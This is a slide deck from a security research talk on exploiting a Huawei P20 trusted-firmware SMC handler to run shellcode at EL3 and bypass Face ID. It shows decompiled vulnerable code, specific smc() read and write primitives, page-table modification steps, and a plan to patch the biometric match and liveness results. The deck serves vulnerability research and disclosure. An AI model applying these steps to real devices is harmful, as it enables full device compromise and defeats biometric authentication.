Slide 1

Slide 1 text

EL3 Tour: Get The Ultimate Privilege of Android Phone
Guanxing Wen, 2019

Slide 2

Slide 2 text

Bio
✤ Senior Security Researcher at Pangu
✤ Exploitation and Reverse Engineering
✤ Recently: Firmware, Bootloader, Kernel
✤ Previously: Adobe Flash

Slide 3

Slide 3 text

Agenda
✤ ARMv8 Privilege mode
✤ Post-startup architecture of Huawei P20
✤ Hunt EL3 Vulnerabilities
✤ Execute shellcode in EL3
✤ Face ID Bypass

Slide 4

Slide 4 text

ARMv8 Privilege Mode
Normal World            Secure World
EL0: Application, Framework, Libraries, Services   S-EL0: Trusted App
EL1: Linux Kernel       S-EL1: Trusted Kernel
EL2: Hypervisor
EL3: Trusted Firmware (no limits: Physical Memory, TTBR0_ELx, VBAR_ELx, …)

Slide 5

Slide 5 text

Huawei P20

Slide 6

Slide 6 text

Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970)

Slide 7

Slide 7 text

Huawei P20
✤ ARMv8 (Hisilicon Kirin 970)
✤ Android phone with great cameras

Slide 8

Slide 8 text

Huawei P20
✤ ARMv8 (Hisilicon Kirin 970)
✤ Android phone with great cameras
✤ Customized EL3 and S-EL0 & 1

Slide 9

Slide 9 text

Boot Chain fastboot.img

Slide 10

Slide 10 text

Boot Chain FASTBOOT

Slide 11

Slide 11 text

Boot Chain FASTBOOT trustfirmware.img teeos.img kernel.img

Slide 12

Slide 12 text

Boot Chain Trusted Firmware teeos.img kernel.img EL3

Slide 14

Slide 14 text

Boot Chain
EL3:   Trusted Firmware
S-EL1: Trusted Core Kernel
S-EL0: globaltask, task_xxx
kernel.img

Slide 15

Slide 15 text

Boot Chain
EL3:   Trusted Firmware
S-EL1: Trusted Core Kernel
S-EL0: globaltask, task_xxx
EL1:   Linux Kernel
EL0:   /sbin/teecd, APK

Slide 16

Slide 16 text

Interact with Secure World
Normal World            Secure World
EL0: APK, /sbin/teecd   S-EL0: globaltask, task_xxx
EL1: Linux Kernel       S-EL1: Trusted Core Kernel
EL3: Trusted Firmware
Transition: svc

Slide 17

Slide 17 text

Interact with Secure World
Normal World            Secure World
EL0: APK, /sbin/teecd   S-EL0: globaltask, task_xxx
EL1: Linux Kernel       S-EL1: Trusted Core Kernel
EL3: Trusted Firmware
Transition: smc

Slide 18

Slide 18 text

Interact with Secure World
Normal World            Secure World
EL0: APK, /sbin/teecd   S-EL0: globaltask, task_xxx
EL1: Linux Kernel       S-EL1: Trusted Core Kernel
EL3: Trusted Firmware

Slide 19

Slide 19 text

Interact with Secure World
Normal World            Secure World
EL0: APK, /sbin/teecd   S-EL0: globaltask, task_xxx
EL1: Linux Kernel       S-EL1: Trusted Core Kernel
EL3: Trusted Firmware
Transition: IPC

Slide 20

Slide 20 text

Interact with Secure World Trusted Firmware EL3

Slide 21

Slide 21 text

ARM Trusted Firmware
✤ https://github.com/ARM-software/arm-trusted-firmware
✤ Switch between Secure and Normal World
✤ Physical Memory Partition
✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, …
✤ Dispatch smc

Slide 22

Slide 22 text

Locate SMC Handler
✤ VBAR_EL3
✤ ida-arm-system-highlight.py

Slide 23

Slide 23 text

✤ VBAR_EL3

Slide 24

Slide 24 text

Dispatched to Trusted Core
Trusted Firmware --eret--> Trusted Core --eret--> Secure Tasks

Slide 25

Slide 25 text

ARM Trusted Firmware (ATF)
✤ Switch between Secure and Normal World
✤ Physical Memory Partition
✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, …
✤ Dispatch SMC
✤ Trusted Core handles most of the smc calls; EL3 handles the rest

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

Hunt EL3 Vulnerabilities

Slide 28

Slide 28 text

Running Environment of EL3 SCTLR_EL3

Slide 29

Slide 29 text

Running Environment of EL3
✤ SCTLR_EL3.WXN = 1
✤ No ASLR
✤ No CFI
✤ SCTLR_EL3.M = 1
✤ TTBR0_EL3
✤ Flat Mapping

Slide 30

Slide 30 text

Memory Layout of EL3
Start       End         Usage         Permission
0x16800000  0x1CE00000  FASTBOOT      R | W
0x1CE00000  0x1FE00000  Trusted Core  R | W
0x1FE00000  0x1FE2A000  ATF CODE      R | E
0x1FE2A000  0x20000000  ATF DATA      R | W
0x209E1000  0x209F8000  ???           R | W
0x5A000000  0xFFFDF000  MMIO          R | W

Slide 31

Slide 31 text

EL1 Kernel as a Start Point
✤ Root Exploit
✤ Purchase an unlock code
✤ Unlock the Bootloader
✤ fastboot flash kernel kernel.img

Slide 32

Slide 32 text

EL1 Kernel as a Start Point
✤ Looking for smc usages

#define RPMB_SVC_REQUEST_ADDR 0xC600FF04
#define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE 0x209E1000

static int hisi_rpmb_device_init(void)
{
    ...skip...
    bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE;
    rpmb_request_phy = bl31_smem_base + data[0];
    atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0);
    ...skip...
}

Slide 33

Slide 33 text

EL1 Kernel as a Start Point
✤ Search for SMC usages

int atfd_hisi_rpmb_smc(u64 function_id, u64 arg0, u64 arg1, u64 arg2)
{
    asm volatile(
        __asmeq("%0", "x0")
        __asmeq("%1", "x1")
        __asmeq("%2", "x2")
        __asmeq("%3", "x3")
        "smc #0\n"
        : "+r" (function_id)
        : "r" (arg0), "r" (arg1), "r" (arg2));
    return (int)function_id;
}

Slide 34

Slide 34 text

EL1 Kernel as a Start Point
✤ Looking for smc usages

#define RPMB_SVC_REQUEST_ADDR 0xC600FF04
#define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE 0x209E1000

static int hisi_rpmb_device_init(void)
{
    ...skip...
    bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE;
    rpmb_request_phy = bl31_smem_base + data[0];
    atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0);
    ...skip...
}

Slide 35

Slide 35 text

No content

Slide 36

Slide 36 text

No content

Slide 37

Slide 37 text

0xC600FF04 Handler

Slide 39

Slide 39 text

0xC600FF04 Handler

if (x0 == 0xC600FF04) {
    if ((rpmb_request_phy = x1) != 0x209E9000) {
        NOTICE("sync kernel and bl31 for a same memory space failed\n");
        goto err;
    }
}

Slide 40

Slide 40 text

0xC600FF06 Handler

if ( x0 == 0xC600FF06 ) {
    v31 = rpmb_request_phy + 0x6000;
    if ( a2 ) {
        NOTICE("rpmb error: the result from kernel is error,%lx\n", a2);
        v32 = *(v31 + 0xC38);
        v33 = x1;
        if ( !v32 )
            return NOTICE("rpmb request callback function is NULL\n");
        return v32(v33);
    }
}

Slide 42

Slide 42 text

0xC600FF06 Handler

if ( x0 == 0xC600FF06 ) {
    v31 = rpmb_request_phy + 0x6000;
    if ( a2 ) {
        NOTICE("rpmb error: the result from kernel is error,%lx\n", a2);
        v32 = *(v31 + 0xC38);
        v33 = x1;
        if ( !v32 )
            return NOTICE("rpmb request callback function is NULL\n");
        return v32(v33);   // Both PC and x0 are controlled !!!
    }
}

Slide 43

Slide 43 text

0xC600FF04 Handler History

if (x0 == 0xC600FF04) {
    rpmb_request_phy = x1;
}

Timeline: ~2018.3 (Ancient)

Slide 44

Slide 44 text

0xC600FF04 Handler History

if (x0 == 0xC600FF04) {
    if ((rpmb_request_phy = x1) != 0x209E9000) {
        ...
    }
}

Timeline: ~2018.3 (Ancient), 2018.5, ~2018.7

Slide 45

Slide 45 text

0xC600FF04 Handler History

if (x0 == 0xC600FF04) {
    if (x1 != 0x209E9000) {
        ...
    }
}

Timeline: ~2018.3 (Ancient), ~2018.7 (Contemporary)

Slide 46

Slide 46 text

0xC600FF06 Handler History

if ( x0 == 0xC600FF06 ) {
    v31 = rpmb_request_phy + 0x6000;
    if ( a2 ) {
        NOTICE("rpmb error: the result from kernel is error,%lx\n", a2);
        v32 = *(v31 + 0xC38);
        v33 = x1;
        if ( !v32 )
            return NOTICE("rpmb request callback function is NULL\n");
        return v32(v33);
    }
}

Timeline: ~2018.7 (Ancient)

Slide 47

Slide 47 text

0xC600FF06 Handler History

if ( x0 == 0xC600FF06 ) {
    v31 = rpmb_request_phy + 0x6000;   // 0x209E0000 is accessible to EL1
    if ( a2 ) {
        NOTICE("rpmb error: the result from kernel is error,%lx\n", a2);
        v32 = *(v31 + 0xC38);
        v33 = x1;
        if ( !v32 )
            return NOTICE("rpmb request callback function is NULL\n");
        return v32(v33);
    }
}

Timeline: ~2018.7 (Ancient)

Slide 48

Slide 48 text

0xC600FF06 Handler History

if ( x0 == 0xC600FF06 ) {
    v31 = callback_vtable;   // inaccessible to EL1
    if ( a2 ) {
        NOTICE("rpmb error: the result from kernel is error,%lx\n", a2);
        v32 = *(v31);
        v33 = x1;
        if ( !v32 )
            return NOTICE("rpmb request callback function is NULL\n");
        return v32(v33);
    }
}

Timeline: ~2018.7 (Ancient), Contemporary
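A host-side C model of the handler logic on slides 39 to 48, added here as an illustration; it is not code from the talk or from the device firmware. It shows the two properties of the contemporary version: x1 is validated before it is stored, and the callback pointer comes from an EL3-private table rather than from the shared region that EL1 can write. The function-id names, the error codes and the globals are assumptions; the ids 0xC600FF04/0xC600FF06 and the address 0x209E9000 are from the slides.

```c
#include <stdint.h>
#include <stddef.h>

#define RPMB_SVC_REQUEST_ADDR 0xC600FF04ULL   /* ids and address from the slides */
#define RPMB_SVC_RESULT       0xC600FF06ULL   /* name assumed */
#define EXPECTED_REQUEST_PHY  0x209E9000ULL

enum { SMC_OK = 0, SMC_EBADADDR = -1, SMC_ENOCB = -2 };

/* EL3-private state, modelled as plain globals. In the real firmware this
 * lives in ATF DATA, which is not mapped for EL1; the shared region at
 * 0x209E1000 is EL1-writable and must never supply a code pointer. */
uint64_t rpmb_request_phy;
int (*callback_vtable[1])(uint64_t);
int result_count;

int rpmb_result_cb(uint64_t result) { result_count++; return (int)result; }
void install_callback(void) { callback_vtable[0] = rpmb_result_cb; }
uint64_t current_request_phy(void) { return rpmb_request_phy; }

static int handle_request_addr(uint64_t x1)
{
    /* Contemporary form (slide 45): validate x1 before storing it. The 2018.5
     * form assigned first, so a rejected value still replaced rpmb_request_phy. */
    if (x1 != EXPECTED_REQUEST_PHY)
        return SMC_EBADADDR;
    rpmb_request_phy = x1;
    return SMC_OK;
}

static int handle_result(uint64_t x1, uint64_t x2)
{
    if (x2 == 0)
        return SMC_OK;
    /* The ancient form loaded the pointer from rpmb_request_phy + 0x6000 + 0xC38,
     * inside the EL1-writable region, and called it with x1 as its argument.
     * The fixed form indexes an EL3-private table instead (slide 48). */
    int (*cb)(uint64_t) = callback_vtable[0];
    if (cb == NULL)
        return SMC_ENOCB;
    return cb(x1);
}

/* Dispatch on the function id in x0, as the ATF SMC handler does. */
int smc_dispatch(uint64_t x0, uint64_t x1, uint64_t x2)
{
    switch (x0) {
    case RPMB_SVC_REQUEST_ADDR: return handle_request_addr(x1);
    case RPMB_SVC_RESULT:       return handle_result(x1, x2);
    default:                    return SMC_OK;
    }
}
```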

Slide 49

Slide 49 text

Control the PC and X0
✤ Kernel module as smc wrapper
✤ insmod exploit.ko
✤ smc(0xC600FF04, func_pa)
✤ smc(0xC600FF06, param)

Slide 50

Slide 50 text

Control the PC and X0
✤ Kernel module as smc wrapper
✤ insmod exploit.ko
✤ Tamper [0x209E9000 + 0x6C38]
✤ smc(0xC600FF06, param)

Slide 51

Slide 51 text

Execute Shellcode in EL3

Slide 52

Slide 52 text

0xC600FF06 Handler
x0 = controlled
x1 = 0x209xxxxx
x2 = 0x1FExxxxx
SCTLR_EL3.WXN, No ASLR, No CFI

Slide 53

Slide 53 text

Write Primitive - Step 1
global_addr = controlled
global_len = 0x209xxxxx
x0 = controlled
x1 = 0x209xxxxx
x2 = 0x1FExxxxx

Slide 54

Slide 54 text

Write Primitive - Step 2
global_addr = controlled
global_len = 0x209xxxxx
x0 = controlled
x2 = 0x1FExxxxx

Slide 55

Slide 55 text

Write Primitive - Step 2
global_addr = controlled
global_len = 0x209xxxxx
x0 = controlled
x2 = 0x1FExxxxx

Slide 58

Slide 58 text

Write Primitive - flawed
global_addr = controlled
global_len = 0x209xxxxx
x0 = controlled
x2 = 0x1FExxxxx

Slide 60

Slide 60 text

R & W Primitives
VTABLE: ptr_function, ptr_function, ptr_function, ptr_function

Slide 61

Slide 61 text

R & W Primitives
VTABLE: read gadget, ptr_function (corrupted), ptr_function

Slide 62

Slide 62 text

R & W Primitives

xxx_handler(x0, x1, x2, x3)
    return ptr_func(x2, x3);

Kernel Module --smc--> xxx_handler --eret--> Kernel Module

Slide 63

Slide 63 text

R & W Primitives

Slide 65

Slide 65 text

R & W Primitives
✤ Memory Read
  ✤ smc(0xC500AA01, addr - 0x18, 0, 0x55BBCCE0 + 1);

Slide 66

Slide 66 text

R & W Primitives
✤ Memory Read
  ✤ smc(0xC500AA01, addr - 0x18, 0, 0x55BBCCE0 + 1);
✤ Memory Write
  ✤ smc(0xC500AA01, addr - 8, value, 0x55BBCCE0 + 2);

Slide 67

Slide 67 text

EL3 Memory Layout
Start       End         Usage          Permission
0x16800000  0x1CE00000  FASTBOOT       R | W
0x1CE00000  0x1FE00000  Trusted Core   R | W
0x1FE00000  0x1FE2A000  ATF CODE       R | E
0x1FE2A000  0x20000000  ATF DATA       R | W
0x209E1000  0x209F8000  Shared Memory  R | W
0x5A000000  0xFFFDF000  MMIO           R | W

Slide 68

Slide 68 text

EL3 Memory Layout
Start       End         Usage          Permission
0x16800000  0x1CE00000  FASTBOOT       R | W
0x1CE00000  0x1FE00000  Trusted Core   R | W
0x1FE00000  0x1FE2A000  ATF CODE       R | E
0x1FE2A000  0x20000000  ATF DATA       R | W
0x209E1000  0x209F8000  Shellcode      R | W
0x5A000000  0xFFFDF000  MMIO           R | W

Slide 69

Slide 69 text

Page Table

Slide 70

Slide 70 text

Page Descriptor 0x209F8627

Slide 71

Slide 71 text

Page Descriptor 0x209F8627: output address 0x209F8000, attributes 0x627

Slide 72

Slide 72 text

Page Descriptor 0x627, lower attribute bits [11:0]
Field           Bits    Value
nG              [11]    0
AF              [10]    1
SH[1:0]         [9:8]   1 0
AP[2:1]         [7:6]   0 0
NS              [5]     1
AttrIndx[2:0]   [4:2]   0 0 1
Type            [1:0]   1 1

Slide 73

Slide 73 text

Page Descriptor

Slide 75

Slide 75 text

Page Descriptor, modified lower attribute bits [11:0]
Field           Bits    Value
nG              [11]    0
AF              [10]    1
SH[1:0]         [9:8]   1 0
AP[2:1]         [7:6]   1 0
NS              [5]     0
AttrIndx[2:0]   [4:2]   0 0 1
Type            [1:0]   1 1

Slide 76

Slide 76 text

Invalidate TLB

Slide 78

Slide 78 text

Execute Shellcode
✤ Deploy Shellcode at 0x209F8000
✤ Page Descriptor Modification: 0x209F8627 => 0x209F8783
✤ TLBI ALLEL3
✤ Invoke 0x209F8000
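A decoder for the page descriptors on slides 70 to 78, added here as a worked example (not code from the talk): it splits a stage-1 descriptor into the fields the slides label and evaluates the WXN rule from slide 29, under which a page that is writable is treated as execute-never, so the descriptor change 0x209F8627 => 0x209F8783 matters because it clears write access (AP[2] set) rather than because it adds an execute bit. Bit positions follow the ARMv8 architecture; the EL3 regime reads AP[2] as read-only and ignores AP[1].

```c
#include <stdint.h>
#include <stdbool.h>

/* Fields of an ARMv8 stage-1 page descriptor as labelled on the slides. */
struct page_desc {
    uint64_t oa;        /* output address, bits [47:12] */
    unsigned attr_indx; /* [4:2]  index into MAIR_EL3 */
    bool     ns;        /* [5]    non-secure */
    unsigned ap;        /* [7:6]  AP[2:1]; AP[2] set means read-only at EL3 */
    unsigned sh;        /* [9:8]  shareability */
    bool     af;        /* [10]   access flag */
    bool     ng;        /* [11]   not-global */
    bool     xn;        /* [54]   execute-never */
    bool     valid;     /* [1:0] == 0b11 marks a valid page descriptor */
};

struct page_desc decode_page_desc(uint64_t d)
{
    struct page_desc p;
    p.valid     = (d & 3) == 3;
    p.oa        = d & 0x0000FFFFFFFFF000ULL;
    p.attr_indx = (d >> 2) & 7;
    p.ns        = (d >> 5) & 1;
    p.ap        = (d >> 6) & 3;
    p.sh        = (d >> 8) & 3;
    p.af        = (d >> 10) & 1;
    p.ng        = (d >> 11) & 1;
    p.xn        = (d >> 54) & 1;
    return p;
}

bool page_is_writable(const struct page_desc *p)
{
    return p->valid && !(p->ap & 2);   /* AP[2] clear: read-write */
}

/* With SCTLR_EL3.WXN = 1 (slide 29) a writable page is execute-never
 * regardless of its XN bit, so a page is either writable or executable. */
bool page_is_executable(const struct page_desc *p, bool wxn)
{
    if (!p->valid || p->xn)
        return false;
    return !(wxn && page_is_writable(p));
}
```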

Slide 79

Slide 79 text

We are in EL3
✤ Do whatever you want
✤ Check all those encrypted modules
✤ Modify and debug every peripheral
✤ Nothing is hidden from you anymore

Slide 80

Slide 80 text

Face ID Bypass

Slide 81

Slide 81 text

Become a Faceless Man

Slide 82

Slide 82 text

EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W

Slide 83

Slide 83 text

Secure Task of Face ID
Normal World       Secure World
/odm/ta/xxx.sec    Trusted Core Kernel: globaltask, task_keymaster, task_gatekeeper

Slide 85

Slide 85 text

Secure Task of Face ID
Normal World       Secure World
                   Trusted Core Kernel: globaltask, task_keymaster, task_gatekeeper, task_xxx

Slide 86

Slide 86 text

Secure Task of Face ID
✤ Dynamically loaded Trusted Application
✤ /odm/ta/e8014913-e501-4d44-a9d6-058ec3b93b90.sec
✤ TEE_SERVICE_FACE_REC
✤ Search and extract it from physical memory

Slide 87

Slide 87 text

Detection Logic of Face ID
✤ Calculate scores as results of image comparison
  ✤ Secure task covers the entire logic
✤ Liveness detection
  ✤ Multiple methods (both the secure task and NS-EL0 are involved)

Slide 88

Slide 88 text

Patch Matching Score

Slide 89

Slide 89 text

Patch Matching Score
✤ svsprintf log messages to /dev/hisi_teelog

Slide 90

Slide 90 text

Patch Liveness Result

Slide 92

Slide 92 text

No content

Slide 93

Slide 93 text

Thank you @hhj4ck